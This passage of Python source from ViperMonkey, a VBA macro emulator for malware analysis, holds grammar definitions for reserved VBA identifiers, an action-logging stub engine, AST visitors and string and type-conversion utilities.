107 | 108 | # TODO: Add more of these as needed or generalize. 109 | #reserved_complex_type_identifier = caselessKeywordsList(("MSForms.fmScrollAction", "MSForms.ReturnSingle")) 110 | simple_type_identifier = Word(initChars=alphas, bodyChars=alphanums + '_') 111 | reserved_complex_type_identifier = Group(simple_type_identifier + ZeroOrMore("." + simple_type_identifier)) 112 | 113 | reserved_atomic_type_identifier = caselessKeywordsList(( 114 | "Boolean", "Byte", "Currency", "Date", "Double", "Integer", 115 | "Long", "LongLong", "LongPtr", "Single", "String", "Variant")) 116 | 117 | reserved_type_identifier = reserved_atomic_type_identifier | reserved_complex_type_identifier 118 | 119 | # A <boolean-literal-identifier> specifying "true" or "false" has a declared type of 120 | # Boolean and a data value of True or False, respectively. 121 | boolean_literal_identifier = CaselessKeyword("true") | CaselessKeyword("false") 122 | 123 | # An <object-literal-identifier> has a 124 | # declared type of Object and the data value Nothing. 125 | object_literal_identifier = CaselessKeyword("nothing") 126 | 127 | # A <variant-literal-identifier> specifying 128 | # "empty" or "null" has a declared type of Variant and the data value Empty or Null, respectively. 129 | variant_literal_identifier = CaselessKeyword("empty") | CaselessKeyword("null") 130 | 131 | # A <literal-identifier> is a <reserved-identifier> that represents a specific distinguished data value 132 | # (section 2.1). 133 | #literal_identifier = boolean_literal_identifier | object_literal_identifier \ 134 | # | variant_literal_identifier 135 | literal_identifier = boolean_literal_identifier | object_literal_identifier 136 | 137 | # A <reserved-for-implementation-use> is a <reserved-identifier> that currently has no defined 138 | # meaning to the VBA language but is reserved for use by language implementers.
139 | reserved_for_implementation_use = caselessKeywordsList(( 140 | "LINEINPUT", "VB_Base", "VB_Control", 141 | "VB_Creatable", "VB_Customizable", "VB_Description", "VB_Exposed", "VB_Ext_KEY", 142 | "VB_GlobalNameSpace", "VB_HelpID", "VB_Invoke_Func", "VB_Invoke_Property", 143 | "VB_Invoke_PropertyPut", "VB_Invoke_PropertyPutRef", "VB_MemberFlags", "VB_Name", 144 | "VB_PredeclaredId", "VB_ProcData", "VB_TemplateDerived", "VB_UserMemId", 145 | "VB_VarDescription", "VB_VarHelpID", "VB_VarMemberFlags", "VB_VarProcData", 146 | "VB_VarUserMemId")) 147 | 148 | # A <future-reserved> is a <reserved-identifier> that currently has no defined meaning to the VBA language but 149 | # is reserved for possible future extensions to the language. 150 | future_reserved = caselessKeywordsList(("CDecl", "Decimal", "DefDec")) 151 | 152 | # reserved-identifier = statement-keyword / marker-keyword / operator-identifier / 153 | # special-form / reserved-name / literal-identifier / rem-keyword / 154 | # reserved-for-implementation-use / future-reserved 155 | reserved_identifier = statement_keyword | marker_keyword | operator_identifier \ 156 | | special_form | reserved_name | literal_identifier | rem_keyword \ 157 | | reserved_for_implementation_use | future_reserved 158 | 159 | -------------------------------------------------------------------------------- /vipermonkey/core/stubbed_engine.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: VBA Library 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis.
6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
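`StubbedEngine.report_action`, defined later in this file, records each reported macro action as an `(action, params, description)` tuple. It transliterates strings with the third-party `unidecode` package and falls back to keeping only `string.printable` characters when decoding fails. The following is a minimal Python 3 sketch of that record-plus-fallback idea. The class name `ActionRecorder` is hypothetical, and the sketch skips the `unicode-escape`/`unidecode` step entirely, so non-ASCII characters are dropped rather than transliterated.

```python
import string


class ActionRecorder(object):
    """Hypothetical stand-in that records (action, params, description) tuples."""

    def __init__(self):
        self.actions = []

    @staticmethod
    def _printable(value):
        # Strings are reduced to characters in string.printable (ASCII letters,
        # digits, punctuation and whitespace); other values pass through unchanged.
        if isinstance(value, str):
            return "".join(ch for ch in value if ch in string.printable)
        return value

    def report_action(self, action, params=None, description=None):
        entry = (self._printable(action),
                 self._printable(params),
                 self._printable(description))
        self.actions.append(entry)
        return entry
```

With made-up inputs, `ActionRecorder().report_action("Run", "calc.exe\x00", "note")` returns `('Run', 'calc.exe', 'note')` because the NUL byte is not in `string.printable`.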
38 | 39 | __version__ = '0.02' 40 | 41 | # sudo pypy -m pip install unidecode 42 | import unidecode 43 | import string 44 | 45 | import logging 46 | from logger import log 47 | 48 | class StubbedEngine(object): 49 | """ 50 | Stubbed out ViperMonkey analysis engine that just supports tracking 51 | actions. 52 | """ 53 | 54 | def __init__(self): 55 | self.actions = [] 56 | 57 | def report_action(self, action, params=None, description=None): 58 | """ 59 | Callback function for each evaluated statement to report macro actions 60 | """ 61 | 62 | # store the action for later use: 63 | try: 64 | if (isinstance(action, str)): 65 | action = unidecode.unidecode(action.decode('unicode-escape')) 66 | except UnicodeDecodeError: 67 | action = ''.join(filter(lambda x:x in string.printable, action)) 68 | if (isinstance(params, str)): 69 | try: 70 | decoded = params.replace("\\", "#ESCAPED_SLASH#").decode('unicode-escape').replace("#ESCAPED_SLASH#", "\\") 71 | params = unidecode.unidecode(decoded) 72 | except Exception as e: 73 | log.warning("Unicode decode of action params failed. " + str(e)) 74 | params = ''.join(filter(lambda x:x in string.printable, params)) 75 | try: 76 | if (isinstance(description, str)): 77 | description = unidecode.unidecode(description.decode('unicode-escape')) 78 | except UnicodeDecodeError as e: 79 | log.warning("Unicode decode of action description failed.
" + str(e)) 80 | description = ''.join(filter(lambda x:x in string.printable, description)) 81 | self.actions.append((action, params, description)) 82 | log.info("ACTION: %s - params %r - %s" % (action, params, description)) 83 | -------------------------------------------------------------------------------- /vipermonkey/core/tagged_block_finder_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of locally defined functions 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from statements import * 41 | 42 | class tagged_block_finder_visitor(visitor): 43 | """ 44 | Collect all the tagged block (labeled block) elements. 45 | """ 46 | 47 | def __init__(self): 48 | self.blocks = {} 49 | self.visited = set() 50 | 51 | def visit(self, item): 52 | if (item in self.visited): 53 | return False 54 | self.visited.add(item) 55 | if (isinstance(item, TaggedBlock)): 56 | self.blocks[item.label] = item 57 | return True 58 | -------------------------------------------------------------------------------- /vipermonkey/core/utils.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey - Utility functions. 3 | 4 | Author: Philippe Lagadec - http://www.decalage.info 5 | License: BSD, see source code or documentation 6 | 7 | Project Repository: 8 | https://github.com/decalage2/ViperMonkey 9 | """ 10 | 11 | #=== LICENSE ================================================================== 12 | 13 | # ViperMonkey is copyright (c) 2015-2018 Philippe Lagadec (http://www.decalage.info) 14 | # All rights reserved. 15 | # 16 | # Redistribution and use in source and binary forms, with or without modification, 17 | # are permitted provided that the following conditions are met: 18 | # 19 | # * Redistributions of source code must retain the above copyright notice, this 20 | # list of conditions and the following disclaimer. 
21 | # * Redistributions in binary form must reproduce the above copyright notice, 22 | # this list of conditions and the following disclaimer in the documentation 23 | # and/or other materials provided with the distribution. 24 | # 25 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 26 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 27 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 28 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 29 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 30 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 31 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 32 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 33 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 34 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 35 | 36 | import re 37 | from curses_ascii import isascii 38 | from curses_ascii import isprint 39 | import base64 40 | 41 | import logging 42 | 43 | # for logging 44 | try: 45 | from core.logger import log 46 | except ImportError: 47 | from logger import log 48 | try: 49 | from core.logger import CappedFileHandler 50 | except ImportError: 51 | from logger import CappedFileHandler 52 | from logging import LogRecord 53 | from logging import FileHandler 54 | import excel 55 | 56 | def safe_str_convert(s): 57 | """ 58 | Convert a string to ASCII without throwing a unicode decode error. 59 | """ 60 | 61 | # Handle Excel strings. 62 | if (isinstance(s, dict) and ("value" in s)): 63 | s = s["value"] 64 | 65 | # Do the actual string conversion.
66 | try: 67 | return str(s) 68 | except UnicodeDecodeError: 69 | return filter(isprint, s) 70 | except UnicodeEncodeError: 71 | return filter(isprint, s) 72 | 73 | class Infix: 74 | """ 75 | Used to define our own infix operators. 76 | """ 77 | def __init__(self, function): 78 | self.function = function 79 | def __ror__(self, other): 80 | return Infix(lambda x, self=self, other=other: self.function(other, x)) 81 | def __or__(self, other): 82 | return self.function(other) 83 | def __rlshift__(self, other): 84 | return Infix(lambda x, self=self, other=other: self.function(other, x)) 85 | def __rshift__(self, other): 86 | return self.function(other) 87 | def __call__(self, value1, value2): 88 | return self.function(value1, value2) 89 | 90 | def safe_plus(x,y): 91 | """ 92 | Handle "x + y" where x and y could be some combination of ints and strs. 93 | """ 94 | 95 | # Handle Excel Cell objects. Grrr. 96 | if excel.is_cell_dict(x): 97 | x = x["value"] 98 | if excel.is_cell_dict(y): 99 | y = y["value"] 100 | 101 | # Handle NULLs. 102 | if (x == "NULL"): 103 | x = 0 104 | if (y == "NULL"): 105 | y = 0 106 | 107 | # Loosely typed languages are terrible. 1 + "3" == 4 while "1" + 3 108 | # = "13". The type of the 1st argument drives the dynamic type 109 | # casting (I think) minus variable type information (Dim a as 110 | # String:a = 1 + "3" gets "13", we're ignoring that here). Pure 111 | # garbage. 112 | if (isinstance(x, str)): 113 | y = str_convert(y) 114 | if (isinstance(x, int)): 115 | y = int_convert(y) 116 | 117 | # Easy case first. 118 | if ((isinstance(x, int) or isinstance(x, float)) and 119 | (isinstance(y, int) or isinstance(y, float))): 120 | return x + y 121 | 122 | # Fix data types. 123 | if (isinstance(y, str)): 124 | 125 | # NULL string in VB. 126 | if (x == 0): 127 | x = "" 128 | 129 | # String concat. 130 | return str(x) + y 131 | 132 | if (isinstance(x, str)): 133 | 134 | # NULL string in VB. 135 | if (y == 0): 136 | y = "" 137 | 138 | # String concat. 
139 | return x + str(y) 140 | 141 | # Punt. We are not doing pure numeric addition and 142 | # we have already handled string concatenation. Just 143 | # convert things to strings and hope for the best. 144 | return str(x) + str(y) 145 | 146 | # Safe plus infix operator. Ugh. 147 | plus=Infix(lambda x,y: safe_plus(x, y)) 148 | 149 | def safe_equals(x,y): 150 | """ 151 | Handle "x = y" where x and y could be some combination of ints and strs. 152 | """ 153 | 154 | # Handle NULLs. 155 | if (x == "NULL"): 156 | x = 0 157 | if (y == "NULL"): 158 | y = 0 159 | 160 | # Easy case first. 161 | if (type(x) == type(y)): 162 | return x == y 163 | 164 | # Booleans and ints can be directly compared. 165 | if ((isinstance(x, bool) and (isinstance(y, int))) or 166 | (isinstance(y, bool) and (isinstance(x, int)))): 167 | return x == y 168 | 169 | # Punt. Just convert things to strings and hope for the best. 170 | return str(x) == str(y) 171 | 172 | # Safe equals and not equals infix operators. Ugh. Loosely typed languages are terrible. 173 | eq=Infix(lambda x,y: safe_equals(x, y)) 174 | neq=Infix(lambda x,y: (not safe_equals(x, y))) 175 | 176 | def safe_print(text): 177 | """ 178 | Sometimes printing large strings when running in a Docker container triggers exceptions. 179 | This function just wraps a print in a try/except block to not crash ViperMonkey when this happens. 180 | """ 181 | text = safe_str_convert(text) 182 | try: 183 | print(text) 184 | except Exception as e: 185 | msg = "ERROR: Printing text failed (len text = " + str(len(text)) + "). 
" + str(e) 186 | if (len(msg) > 100): 187 | msg = msg[:100] 188 | try: 189 | print(msg) 190 | except: 191 | pass 192 | 193 | # if our logger has a FileHandler, we need to tee this print to a file as well 194 | for handler in log.handlers: 195 | if type(handler) is FileHandler or type(handler) is CappedFileHandler: 196 | # set the format to be like a print, not a log, then set it back 197 | handler.setFormatter(logging.Formatter("%(message)s")) 198 | handler.emit(LogRecord(log.name, logging.INFO, "", None, text, None, None, "safe_print")) 199 | handler.setFormatter(logging.Formatter("%(levelname)-8s %(message)s")) 200 | 201 | def fix_python_overlap(var_name): 202 | builtins = set(["str", "list", "bytes", "pass"]) 203 | if (var_name.lower() in builtins): 204 | var_name = "MAKE_UNIQUE_" + var_name 205 | var_name = var_name.replace("$", "__DOLLAR__") 206 | # RegExp object? 207 | if ((not var_name.endswith(".Pattern")) and 208 | (not var_name.endswith(".Global"))): 209 | var_name = var_name.replace(".", "") 210 | return var_name 211 | 212 | def b64_decode(value): 213 | """ 214 | Base64 decode a string. 215 | """ 216 | 217 | try: 218 | # Make sure this is a potentially valid base64 string 219 | tmp_str = "" 220 | try: 221 | tmp_str = filter(isascii, str(value).strip()) 222 | except UnicodeDecodeError: 223 | return None 224 | tmp_str = tmp_str.replace(" ", "").replace("\x00", "") 225 | b64_pat = r"^[A-Za-z0-9+/=]+$" 226 | if (re.match(b64_pat, tmp_str) is not None): 227 | 228 | # Pad out the b64 string if needed. 229 | missing_padding = len(tmp_str) % 4 230 | if missing_padding: 231 | tmp_str += b'='* (4 - missing_padding) 232 | 233 | # Return the decoded value. 234 | conv_val = base64.b64decode(tmp_str) 235 | return conv_val 236 | 237 | # Base64 conversion error. 238 | except Exception as e: 239 | pass 240 | 241 | # No valid base64 decode. 242 | return None 243 | 244 | class vb_RegExp(object): 245 | """ 246 | Class to simulate a VBS RegEx object in python. 
247 | """ 248 | 249 | def __init__(self): 250 | self.Pattern = None 251 | self.Global = False 252 | 253 | def __repr__(self): 254 | return "" 255 | 256 | def _get_python_pattern(self): 257 | pat = self.Pattern 258 | if (pat is None): 259 | return None 260 | if (pat.strip() != "."): 261 | pat1 = pat.replace("$", "\\$").replace("-", "\\-") 262 | fix_dash_pat = r"(\[.\w+)\\\-(\w+\])" 263 | pat1 = re.sub(fix_dash_pat, r"\1-\2", pat1) 264 | fix_dash_pat1 = r"\((\w+)\\\-(\w+)\)" 265 | pat1 = re.sub(fix_dash_pat1, r"[\1-\2]", pat1) 266 | pat = pat1 267 | return pat 268 | 269 | def Test(self, string): 270 | pat = self._get_python_pattern() 271 | #print "PAT: '" + pat + "'" 272 | #print "STR: '" + string + "'" 273 | #print re.findall(pat, string) 274 | if (pat is None): 275 | return False 276 | return (re.search(pat, string) is not None) 277 | 278 | def Replace(self, string, rep): 279 | pat = self._get_python_pattern() 280 | if (pat is None): 281 | return string 282 | rep = re.sub(r"\$(\d)", r"\\\1", rep) 283 | r = string 284 | try: 285 | r = re.sub(pat, rep, string) 286 | except Exception as e: 287 | pass 288 | return r 289 | 290 | def get_num_bytes(i): 291 | """ 292 | Get the minimum number of bytes needed to represent a given 293 | int value. 294 | """ 295 | 296 | # 1 byte? 297 | if ((i & 0x00000000FF) == i): 298 | return 1 299 | # 2 bytes? 300 | if ((i & 0x000000FFFF) == i): 301 | return 2 302 | # 4 bytes? 303 | if ((i & 0x00FFFFFFFF) == i): 304 | return 4 305 | # Let's go with 8 bytes. 306 | return 8 307 | 308 | def int_convert(arg, leave_alone=False): 309 | """ 310 | Convert a VBA expression to an int, handling VBA NULL. 311 | """ 312 | 313 | # Easy case. 314 | if (isinstance(arg, int)): 315 | return arg 316 | 317 | # NULLs are 0. 318 | if (arg == "NULL"): 319 | return 0 320 | 321 | # Empty strings are NULL. 322 | if (arg == ""): 323 | return "NULL" 324 | 325 | # Leave the wildcard matching value alone.
326 | if (arg == "**MATCH ANY**"): 327 | return arg 328 | 329 | # Convert float to int? 330 | if (isinstance(arg, float)): 331 | arg = int(round(arg)) 332 | 333 | # Convert hex to int? 334 | if (isinstance(arg, str) and (arg.strip().lower().startswith("&h"))): 335 | hex_str = "0x" + arg.strip()[2:] 336 | try: 337 | return int(hex_str, 16) 338 | except Exception as e: 339 | log.error("Cannot convert hex '" + str(arg) + "' to int. Defaulting to 0. " + str(e)) 340 | return 0 341 | 342 | arg_str = str(arg) 343 | if ("." in arg_str): 344 | arg_str = arg_str[:arg_str.index(".")] 345 | try: 346 | return int(arg_str) 347 | except Exception as e: 348 | if (not leave_alone): 349 | log.error("Cannot convert '" + str(arg_str) + "' to int. Defaulting to 0. " + str(e)) 350 | return 0 351 | log.error("Cannot convert '" + str(arg_str) + "' to int. Leaving unchanged. " + str(e)) 352 | return arg_str 353 | 354 | def str_convert(arg): 355 | """ 356 | Convert a VBA expression to a str, handling VBA NULL. 357 | """ 358 | if (arg == "NULL"): 359 | return '' 360 | if (excel.is_cell_dict(arg)): 361 | arg = arg["value"] 362 | try: 363 | return str(arg) 364 | except Exception as e: 365 | if (isinstance(arg, unicode)): 366 | return ''.join(filter(lambda x:x in string.printable, arg)) 367 | log.error("Cannot convert given argument to str. Defaulting to ''. " + str(e)) 368 | return '' 369 | 370 | def strip_nonvb_chars(s): 371 | """ 372 | Strip invalid VB characters from a string. 373 | """ 374 | 375 | # Handle unicode strings. 376 | if (isinstance(s, unicode)): 377 | s = s.encode('ascii','replace') 378 | 379 | # Sanity check. 380 | if (not isinstance(s, str)): 381 | return s 382 | 383 | # Do we need to do this? 384 | if (re.search(r"[^\x09-\x7e]", s) is None): 385 | return s 386 | 387 | # Strip non-ascii printable characters. 388 | r = re.sub(r"[^\x09-\x7e]", "", s) 389 | 390 | # Strip multiple 'NULL' substrings from the string.
391 | if (r.count("NULL") > 10): 392 | r = r.replace("NULL", "") 393 | return r 394 | 395 | -------------------------------------------------------------------------------- /vipermonkey/core/var_defn_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of declared variables. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from statements import * 41 | 42 | class var_defn_visitor(visitor): 43 | """ 44 | Collect the names of all declared variables. 45 | """ 46 | 47 | def __init__(self): 48 | self.variables = set() 49 | self.visited = set() 50 | 51 | def visit(self, item): 52 | if (item in self.visited): 53 | return False 54 | self.visited.add(item) 55 | if (isinstance(item, Dim_Statement)): 56 | for name, _, _, _ in item.variables: 57 | self.variables.add(str(name)) 58 | if (isinstance(item, Let_Statement)): 59 | self.variables.add(str(item.name)) 60 | return True 61 | -------------------------------------------------------------------------------- /vipermonkey/core/var_in_expr_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of variables used in an expression. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis.
6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from statements import * 41 | 42 | class var_in_expr_visitor(visitor): 43 | """ 44 | Get the names of all variables that appear in an expression. 
45 | """ 46 | 47 | def __init__(self, context=None): 48 | self.variables = set() 49 | self.visited = set() 50 | self.context = context 51 | 52 | def visit(self, item): 53 | from expressions import SimpleNameExpression 54 | from expressions import Function_Call 55 | from expressions import MemberAccessExpression 56 | from vba_object import VbaLibraryFunc 57 | from vba_object import VBA_Object 58 | 59 | # Already looked at this? 60 | if (item in self.visited): 61 | return False 62 | self.visited.add(item) 63 | 64 | # Simple variable? 65 | if (isinstance(item, SimpleNameExpression)): 66 | self.variables.add(str(item.name)) 67 | 68 | # Array access? 69 | if (("Function_Call" in str(type(item))) and (self.context is not None)): 70 | 71 | # Is this an array or function? 72 | if (hasattr(item, "name") and (self.context.contains(item.name))): 73 | ref = self.context.get(item.name) 74 | if (isinstance(ref, list) or isinstance(ref, str)): 75 | self.variables.add(str(item.name)) 76 | 77 | # Member access expression used as a variable? 78 | if (isinstance(item, MemberAccessExpression)): 79 | rhs = item.rhs 80 | if (isinstance(rhs, list)): 81 | rhs = rhs[-1] 82 | if (isinstance(rhs, SimpleNameExpression)): 83 | self.variables.add(str(item)) 84 | 85 | return True 86 | -------------------------------------------------------------------------------- /vipermonkey/core/vb_str.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Class for representing VBA strings that contain a mix of ASCII and 3 | wide characters. 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis.
7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
